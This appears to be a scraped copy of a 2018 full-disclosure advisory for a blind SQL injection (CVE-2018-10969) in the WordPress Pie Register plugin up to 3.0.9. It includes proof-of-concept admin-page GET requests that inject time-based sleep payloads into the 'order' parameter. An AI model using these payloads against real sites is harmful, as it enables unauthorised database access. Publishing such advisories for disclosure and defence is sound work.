扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection # Author: Manuel García Cárdenas # Date: 2018-05-10 # Software: WordPress Plugin Pie Register 3.0.9 # CVE: CVE-2018-10969 # I. VULNERABILITY # WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection # II. BACKGROUND # Pie-Register is a quick and easy way to brand your Registration Pages on # WordPress sites. # III. DESCRIPTION # This bug was found using the portal in the files: # /pie-register/classes/invitation_code_pagination.php:if ( isset( # $_GET['order'] ) && $_GET['order'] ) # /pie-register/classes/invitation_code_pagination.php:$order = # $_GET['order']; # And when the query is executed, the parameter "order" it is not sanitized. # /pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order ); # IV. PROOF OF CONCEPT # The following URL have been confirmed to all suffer from Time Based SQL Injection. GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1(2 seconds of response) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1(30 seconds of response) # V. SYSTEMS AFFECTED # Pie Register <= 3.0.9 # VI. DISCLOSURE TIMELINE # May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas # May 10, 2018 2: Send to vendor without response # June 05, 2018 3: Second email to vendor without response # June 11, 2018 4: Send to the Full-Disclosure lists # VII. Solution # Disable plugin until a fix is available |
体验盒子
